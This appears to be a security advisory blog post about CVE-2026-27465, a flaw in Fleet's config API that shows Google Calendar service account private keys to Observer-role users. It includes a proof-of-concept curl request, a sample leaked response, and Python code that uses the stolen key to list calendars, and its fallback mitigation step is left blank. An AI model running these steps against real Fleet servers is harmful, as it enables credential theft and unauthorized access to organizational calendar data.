CVE-2026-27465 - Exposed Google Calendar Credentials in Fleet API — Analysis, PoC, and Fix

Summary:
A recent vulnerability, CVE-2026-27465, affects Fleet, the popular open source device management software. Versions prior to 4.80.1 expose Google Calendar service account credentials via a misconfigured API. This allows even low-privilege users (“Observer” role) to retrieve sensitive service account keys, giving them unauthorized access to your organization’s Google Calendar (and potentially other Google Workspace resources).

What is Fleet?

Fleet is a widely used tool for device management across organizations. It lets administrators manage device policies, run queries, and integrate with other services, like Google Calendar for scheduling.

The Vulnerability in Simple Terms

- Who’s affected: Organizations running Fleet versions before 4.80.1 with Google Calendar integration enabled.
- What happened: The configuration API endpoint (/api/v1/fleet/config) returned sensitive Google Calendar service account credentials, including the private key, even to users with the lowest possible privileges (Observers).
- Impact: Anyone with authenticated access (including Observers) could grab the private key and impersonate the trusted Google service account outside of Fleet, gaining unauthorized access to calendar data—or other Google Workspace assets linked to that account.

How the Leak Happens

The Fleet backend includes a configuration API, which is used to fetch (and sometimes update) integration credentials. A normal GET request might return sanitized data — but here, the private key field was included in the JSON payload for ALL authenticated users.

API Request Example

curl -s -X GET -H "Authorization: Bearer $OBSERVER_TOKEN" \
  https://fleet.example.org/api/v1/fleet/config

Response (Sensitive data revealed)

{
  "integrations": {
    "google_calendar": {
      "enabled": true,
      "service_account": {
        "type": "service_account",
        "project_id": "my-corp-calendar",
        "private_key_id": "xxxxxxx",
        "private_key": "-----BEGIN PRIVATE KEY-----\nMIIEvAIBADAN...END PRIVATE KEY-----\n",
        "client_email": "fleet-calendar@my-corp-calendar.iam.gserviceaccount.com",
        ...
      }
    }
  }
}

The private_key field should never be visible to low-privileged users.

With the private key and service account details, an attacker can

1. Impersonate the service account: Using Google APIs, they can authenticate as the service account.
2. Access calendar events: Read, edit, or delete calendar events for any resource the account can see.
3. (Worse) Access other linked Google Workspace data: If the service account has broader privileges, other data may be at risk.

Save the JSON credentials to service_account.json, then use the Google API Python client

from google.oauth2 import service_account
from googleapiclient.discovery import build

creds = service_account.Credentials.from_service_account_file("service_account.json", scopes=['https://www.googleapis.com/auth/calendar.readonly';])
service = build('calendar', 'v3', credentials=creds)

calendar_list = service.calendarList().list().execute()
print(calendar_list)

If successful, this prints all calendars the service account can access — as an Observer or anyone with Fleet login.

Security Implications

- Privilege Escalation within Fleet: *Not possible* — the bug does not grant additional Fleet permissions.
- Access to Google Calendar: *Possible* — attacker can read or manipulate calendars, and potentially other Google APIs if the account has those permissions.

How to Fix

1. Upgrade Fleet to 4.80.1 or later
This version fixes the bug, ensuring credentials are not exposed to non-admin roles.

2. If upgrade isn’t possible:

References

- Fleet Security Advisory (look for CVE-2026-27465)
- Official Release notes for 4.80.1
- Google Service Accounts Documentation

Conclusion

CVE-2026-27465 is a reminder that even “observer-level” users can pose a risk if backends are too liberal with sensitive fields. If your Fleet server is affected, patch as soon as possible and rotate your Google API credentials. Always limit service account access to exactly what’s needed.

Stay secure!

*This post is exclusive to this site and not found elsewhere. If you have questions about remediating CVE-2026-27465 in Fleet, leave a comment below.*

Timeline

Published on: 02/26/2026 02:54:04 UTC
Last modified on: 02/27/2026 14:06:59 UTC